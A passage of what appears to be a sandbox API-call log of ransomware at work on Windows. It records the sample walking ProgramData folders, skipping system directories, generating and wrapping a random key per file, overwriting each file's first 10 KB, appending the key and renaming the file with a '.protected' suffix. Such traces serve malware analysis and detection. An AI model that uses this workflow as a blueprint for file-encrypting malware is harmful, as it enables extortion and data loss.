lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.039] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.039] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.040] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\.") returned 41 [0065.040] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.040] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.040] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.040] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.040] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.040] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.040] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.040] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\..") returned 42 [0065.040] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.040] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.040] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.040] lstrcmpiW (lpString1="Client", lpString2="Windows") returned -1 [0065.040] lstrcmpiW (lpString1="Client", lpString2="Program Files") returned -1 [0065.040] lstrcmpiW (lpString1="Client", lpString2="Program Files (x86)") returned -1 [0065.040] lstrcmpiW (lpString1="Client", lpString2="$Recycle.bin") returned 1 [0065.040] lstrcmpiW (lpString1="Client", lpString2="System Volume Information") returned -1 [0065.040] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client") returned 46 [0065.040] lstrcmpW (lpString1="Client", lpString2=".") 
returned 1 [0065.040] lstrcmpW (lpString1="Client", lpString2="..") returned 1 [0065.040] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*") returned 48 [0065.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0065.040] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.040] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.040] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.040] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.040] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.041] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\.") returned 48 [0065.041] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.041] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.041] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.041] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.041] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.041] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.041] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.041] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\..") returned 49 [0065.041] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.041] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.041] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.041] lstrcmpiW (lpString1="1.0", 
lpString2="Windows") returned -1 [0065.041] lstrcmpiW (lpString1="1.0", lpString2="Program Files") returned -1 [0065.041] lstrcmpiW (lpString1="1.0", lpString2="Program Files (x86)") returned -1 [0065.041] lstrcmpiW (lpString1="1.0", lpString2="$Recycle.bin") returned 1 [0065.041] lstrcmpiW (lpString1="1.0", lpString2="System Volume Information") returned -1 [0065.041] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0") returned 50 [0065.041] lstrcmpW (lpString1="1.0", lpString2=".") returned 1 [0065.041] lstrcmpW (lpString1="1.0", lpString2="..") returned 1 [0065.041] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*") returned 52 [0065.041] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0065.041] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.041] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.041] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.041] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.041] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.041] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\.") returned 52 [0065.042] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.042] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.042] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.042] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.042] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.042] lstrcmpiW 
(lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.042] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.042] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\..") returned 53 [0065.042] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.042] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.042] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.042] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0065.042] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0065.042] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0065.042] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0065.042] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0065.042] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned 56 [0065.042] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0065.042] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0065.042] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*") returned 58 [0065.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0065.044] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.044] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.044] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.044] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.044] lstrcmpiW (lpString1=".", lpString2="System 
Volume Information") returned -1 [0065.044] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\.") returned 58 [0065.044] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.044] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.045] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.045] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.045] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.045] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.045] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.045] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\..") returned 59 [0065.045] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.045] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.045] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.045] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="Windows") returned -1 [0065.045] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="Program Files") returned -1 [0065.045] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="Program Files (x86)") returned -1 [0065.045] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="$Recycle.bin") returned 1 [0065.045] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="System Volume Information") returned -1 [0065.045] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 76 [0065.045] StrStrIW (lpFirst="Help_CValidator.H1D", lpSrch=".protected") returned 0x0 [0065.045] lstrcmpW 
(lpString1="Help_CValidator.H1D", lpString2="RESTORE_FILES.txt") returned -1 [0065.045] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.045] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0065.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.046] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 76 [0065.046] StrStrW (lpFirst="Help_CValidator.H1D", lpSrch=".txt") returned 0x0 [0065.046] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 76 [0065.046] StrStrW (lpFirst="Help_CValidator.H1D", lpSrch=".rar") returned 0x0 [0065.046] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 76 [0065.046] StrStrW (lpFirst="Help_CValidator.H1D", lpSrch=".zip") returned 0x0 [0065.046] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.054] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.054] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, 
lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.054] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.055] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.055] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0065.055] CloseHandle (hObject=0x14c) returned 1 [0065.055] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.protected") returned 86 [0065.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.protected" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d.protected")) returned 1 [0065.056] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.056] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="Windows") returned -1 [0065.056] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="Program Files") returned -1 [0065.056] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="Program Files (x86)") returned -1 [0065.056] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="$Recycle.bin") returned 1 [0065.056] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="System Volume Information") 
returned -1 [0065.056] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 78 [0065.056] StrStrIW (lpFirst="Help_MKWD_AssetId.H1W", lpSrch=".protected") returned 0x0 [0065.056] lstrcmpW (lpString1="Help_MKWD_AssetId.H1W", lpString2="RESTORE_FILES.txt") returned -1 [0065.056] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.056] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0065.056] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.056] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 78 [0065.056] StrStrW (lpFirst="Help_MKWD_AssetId.H1W", lpSrch=".txt") returned 0x0 [0065.056] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 78 [0065.056] StrStrW (lpFirst="Help_MKWD_AssetId.H1W", lpSrch=".rar") returned 0x0 [0065.057] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 78 [0065.057] StrStrW (lpFirst="Help_MKWD_AssetId.H1W", lpSrch=".zip") returned 0x0 [0065.057] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.070] SetFilePointerEx 
(in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.070] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.071] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.071] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.073] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0065.073] CloseHandle (hObject=0x14c) returned 1 [0065.073] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.protected") returned 88 [0065.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.protected" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w.protected")) returned 1 [0065.074] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.074] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="Windows") returned -1 [0065.074] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="Program 
Files") returned -1 [0065.074] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="Program Files (x86)") returned -1 [0065.074] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="$Recycle.bin") returned 1 [0065.074] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="System Volume Information") returned -1 [0065.074] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 78 [0065.074] StrStrIW (lpFirst="Help_MKWD_BestBet.H1W", lpSrch=".protected") returned 0x0 [0065.074] lstrcmpW (lpString1="Help_MKWD_BestBet.H1W", lpString2="RESTORE_FILES.txt") returned -1 [0065.074] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.074] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0065.074] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.076] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 78 [0065.076] StrStrW (lpFirst="Help_MKWD_BestBet.H1W", lpSrch=".txt") returned 0x0 [0065.076] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 78 [0065.076] StrStrW (lpFirst="Help_MKWD_BestBet.H1W", lpSrch=".rar") returned 0x0 [0065.076] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 78 [0065.076] StrStrW 
(lpFirst="Help_MKWD_BestBet.H1W", lpSrch=".zip") returned 0x0 [0065.076] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.084] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.084] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.085] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.085] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.086] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0065.086] CloseHandle (hObject=0x14c) returned 1 [0065.086] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.protected") returned 88 [0065.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.protected" (normalized: 
"c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w.protected")) returned 1 [0065.087] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.087] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="Windows") returned -1 [0065.087] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="Program Files") returned -1 [0065.087] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="Program Files (x86)") returned -1 [0065.087] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="$Recycle.bin") returned 1 [0065.087] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="System Volume Information") returned -1 [0065.087] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 75 [0065.087] StrStrIW (lpFirst="Help_MTOC_help.H1H", lpSrch=".protected") returned 0x0 [0065.087] lstrcmpW (lpString1="Help_MTOC_help.H1H", lpString2="RESTORE_FILES.txt") returned -1 [0065.087] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.087] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0065.087] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.087] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 75 [0065.087] StrStrW (lpFirst="Help_MTOC_help.H1H", lpSrch=".txt") returned 0x0 [0065.087] lstrlenW 
(lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 75 [0065.087] StrStrW (lpFirst="Help_MTOC_help.H1H", lpSrch=".rar") returned 0x0 [0065.087] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 75 [0065.087] StrStrW (lpFirst="Help_MTOC_help.H1H", lpSrch=".zip") returned 0x0 [0065.088] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.089] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.089] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.089] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.090] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.097] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0065.097] CloseHandle (hObject=0x14c) returned 1 [0065.097] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: 